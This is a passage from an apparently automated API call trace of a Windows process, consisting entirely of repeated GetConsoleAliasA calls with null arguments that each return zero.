TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.588] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.589] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0165.590] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.307] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.308] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.309] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.310] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0264.311] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, 